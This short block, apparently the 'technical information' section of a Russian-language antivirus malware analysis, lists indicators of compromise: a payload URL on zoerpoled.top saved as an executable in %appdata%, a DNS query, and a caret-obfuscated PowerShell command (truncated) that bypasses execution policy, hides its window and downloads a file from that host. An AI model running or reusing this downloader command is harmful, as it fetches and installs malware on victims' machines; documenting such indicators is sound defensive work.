Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "po^WeR^SHelL.EX^e ^-^ExE^C^Ut^i^o^nP^O^licy By^pASS ^-nOPROf^ILe -WIndowS^T^YLE hID^DeN (NeW-^o^bJ^ecT ^SysT^e^M.NE^t.^we^BC^LIEN^T^).dOWn^LoadfI^LE('http://www.zoerpoled.top/read.ph...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /c "po^WeR^SHelL.EX^e ^-^ExE^C^Ut^i^o^nP^O^licy By^pASS ^-nOPROf^ILe -WIndowS^T^YLE hID^DeN (NeW-^o^bJ^ecT ^SysT^e^M.NE^t.^we^BC^LIEN^T^).dOWn^LoadfI^LE('http://www.zoerpoled.top/read.ph...' (со скрытым окном)